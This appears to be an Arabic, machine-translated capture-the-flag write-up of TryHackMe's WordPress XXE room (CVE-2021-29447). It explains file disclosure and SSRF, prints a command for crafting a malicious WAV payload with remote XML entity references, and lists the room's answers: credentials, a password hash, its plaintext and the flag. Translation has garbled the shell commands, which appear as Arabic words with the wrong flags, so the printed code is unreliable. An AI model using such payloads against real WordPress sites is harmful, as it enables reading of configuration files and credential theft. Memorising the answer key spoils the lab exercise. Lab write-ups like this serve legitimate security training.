لقد قمنا بتغطية ثغرة WordPress XXE CVE-2021-29447 التي تسمح بالكشف عن الملفات الحساسة وتزوير الطلب من جانب الخادم (SSRF). لقد استغلنا ثغرة WordPress هذه من خلال إنشاء حمولة WAV وتحميلها على موقع WordPress المخترق. كان هذا جزءًا من TryHackMe وورد: CVE-2021-29447 غرفة.
دورة Splunk SIEM الكاملة مع سيناريوهات عملية
يسلط الضوء
ما هي ثغرة XXE
يعد هجوم كيان خارجي XML (XXE) ثغرة أمنية تسيء استخدام ميزات محللي/بيانات XML. غالبًا ما يسمح للمهاجم بالتفاعل مع أي أنظمة خلفية أو خارجية يمكن للتطبيق نفسه الوصول إليها ويمكن أن يسمح للمهاجم بقراءة الملف الموجود على هذا النظام. يمكنهم أيضًا التسبب في هجوم رفض الخدمة (DoS) أو يمكنهم استخدام XXE لتنفيذ تزوير الطلب من جانب الخادم (SSRF) الذي يحفز تطبيق الويب على تقديم طلبات إلى تطبيقات أخرى. قد يقوم XXE بتمكين فحص المنافذ ويؤدي إلى تنفيذ التعليمات البرمجية عن بعد.
تأثير ووردبريس CVE-2021-29447
- الكشف التعسفي عن الملف: يمكن استرداد محتويات أي ملف على نظام الملفات الخاص بالمضيف، على سبيل المثال wp-config.php الذي يحتوي على بيانات حساسة مثل بيانات اعتماد قاعدة البيانات.
- تزوير الطلب من جانب الخادم (SSRF): يمكن إجراء طلبات HTTP نيابة عن تثبيت WordPress. اعتمادا على البيئة، وهذا يمكن أن يكون له تأثير خطير.
إنشاء الحمولة
يمكنك إنشاء حمولة WAV باستخدام الأوامر الموضحة أدناه
نانو poc.wav
# يقوم بإنشاء ملف wav
صدى -ar 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00 <!DOCTYPE ANY[ %remote;%init;%trick;]>\x00' > payload.wav
# قم بلصق الحمولة باستخدام الصدى، وقم بتغيير IP والمنفذ ليتناسب مع جهازك
مراجع
- WordPress 5.7 – 'مكتبة الوسائط' حقن الكيان الخارجي بتنسيق XML (XXE) (مصادق عليه): استغلال-DB
- WordPress 5.6-5.7 – مصادق عليه (المؤلف+) XXE (CVE-2021-29447): جيثب
- WordPress 5.6-5.7 – تمت المصادقة على XXE داخل مكتبة الوسائط التي تؤثر على PHP 8: com.wpscan
إجابات الغرفة
بناءً على نتائج #1، ما اسم قاعدة البيانات الخاصة بـ WordPress؟
ووردبريسdb2
بناءً على نتائج #1، ما هي بيانات الاعتماد التي وجدتها؟
مثال: المستخدم: كلمة المرور
الظل الداكن:sUp3rS3cret132
تعداد وتحديد ما هي قواعد البيانات المثبتة على الخادم؟
ماي إس كيو إل
بناءً على نتائج #4، ما هو إصدار dbms المثبت على الخادم؟
5.7.33
بناءً على نتائج #4، ما هو المنفذ الذي يعمل عليه نظام إدارة قواعد البيانات؟
3306
اختراق قواعد البيانات، ما هي كلمة المرور المشفرة الموجودة في جدول مستخدمي ووردبريس بالمعرف 1؟؟
$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
بناء على نتائج #7، ما هي كلمة المرور في النص العادي؟
دمية دب
قم باختراق الجهاز وتحديد موقع flag.txt
ثهم{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c72}
تجول الفيديو